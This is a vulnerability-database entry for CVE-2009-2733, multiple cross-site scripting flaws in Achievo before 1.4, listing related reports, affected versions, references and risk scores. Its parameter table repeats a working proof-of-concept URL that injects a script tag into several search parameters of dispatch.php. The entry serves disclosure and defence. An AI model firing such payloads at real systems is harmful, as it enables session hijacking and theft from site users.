CVE-2009-2733

🗓️ 16 Oct 2009 16:00:00Reported by mitreType

cve🔗 web.nvd.nist.gov👁 61 Views🌐 WEB

CVE-2009-2733 Multiple XSS vulnerabilities in Achievo before 1.4.

Reporter	Title	Published	Views	Family All 14
0day.today	Achievo <= 1.3.4 xss	14 Oct 200900:00	–	zdt
Tenable Nessus	Achievo < 1.4.0 Multiple Vulnerabilities	15 Oct 200900:00	–	nessus
Circl	CVE-2009-2733	13 Oct 200900:00	–	circl
Cvelist	CVE-2009-2733	16 Oct 200916:00	–	cvelist
Exploit DB	Achievo 1.3.4 - Cross-Site Scripting	14 Oct 200900:00	–	exploitdb
EUVD	EUVD-2009-2724	7 Oct 202500:30	–	euvd
exploitpack	Achievo 1.3.4 - Cross-Site Scripting	14 Oct 200900:00	–	exploitpack
NVD	CVE-2009-2733	16 Oct 200916:30	–	nvd
Packet Storm	Achievo Cross Site Scripting	14 Oct 200900:00	–	packetstorm
Prion	Cross site scripting	16 Oct 200916:30	–	prion

NVD

Node

achievo achievoRange≤1.3.4

achievo achievoMatch0.7.0

achievo achievoMatch0.7.1

achievo achievoMatch0.7.2

achievo achievoMatch0.7.3

achievo achievoMatch0.8.0

achievo achievoMatch0.8.0_rc1

achievo achievoMatch0.8.0_rc2

achievo achievoMatch0.8.1

achievo achievoMatch0.9.0

achievo achievoMatch0.9.1

achievo achievoMatch1.0.0

achievo achievoMatch1.0.0rc1

achievo achievoMatch1.0.0rc2

achievo achievoMatch1.0.0rc3

achievo achievoMatch1.0.1

achievo achievoMatch1.0.2

achievo achievoMatch1.0.3

achievo achievoMatch1.0.4

achievo achievoMatch1.1.0

achievo achievoMatch1.1.0rc1

achievo achievoMatch1.1.0rc2

achievo achievoMatch1.1.0rc3

achievo achievoMatch1.2.0

achievo achievoMatch1.2.0rc1

achievo achievoMatch1.2.1

achievo achievoMatch1.3.0

achievo achievoMatch1.3.0rc1

achievo achievoMatch1.3.0rc2

achievo achievoMatch1.3.1

achievo achievoMatch1.3.2

achievo achievoMatch1.3.3

Source	Link
exchange	www.exchange.xforce.ibmcloud.com/vulnerabilities/53745
bonsai-sec	www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
securityfocus	www.securityfocus.com/bid/36661
securityfocus	www.securityfocus.com/archive/1/507133/100/0/threaded
achievo	www.achievo.org/download/releasenotes/1_4_0
bonsai-sec	www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/
secunia	www.secunia.com/advisories/37035
exchange	www.exchange.xforce.ibmcloud.com/vulnerabilities/53744
securitytracker	www.securitytracker.com/id

Parameter	Position	Path	Description	CWE
atksearch[contractnumber]	query param	/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring&atksearchmode[contracttype]=exact&atksearch_AE_contracttype[contracttype]=	Persistent/reflected XSS via parameters in Organisation Contracts admin page (dispatch.php).	CWE-79
atksearch_AE_customer[customer]	query param	/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring&atksearchmode[contracttype]=exact&atksearch_AE_contracttype[contracttype]=	Persistent/reflected XSS via parameters in Organisation Contracts admin page (dispatch.php).	CWE-79
atksearchmode[contracttype]	query param	/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring&atksearchmode[contracttype]=exact&atksearch_AE_contracttype[contracttype]=	Persistent/reflected XSS via parameters in Organisation Contracts admin page (dispatch.php).	CWE-79
atksearch[contractname]	query param	/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring&atksearchmode[contracttype]=exact&atksearch_AE_contracttype[contracttype]=	Persistent/reflected XSS via parameters in Organisation Contracts admin page (dispatch.php).	CWE-79
atksearchmode[contractname]	query param	/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring&atksearchmode[contracttype]=exact&atksearch_AE_contracttype[contracttype]=	Persistent/reflected XSS via parameters in Organisation Contracts admin page (dispatch.php).	CWE-79

23 Apr 2026 00:35Current

5.7Medium risk

Vulners AI Score5.7

CVSS 24.3

EPSS0.05471

CWE-79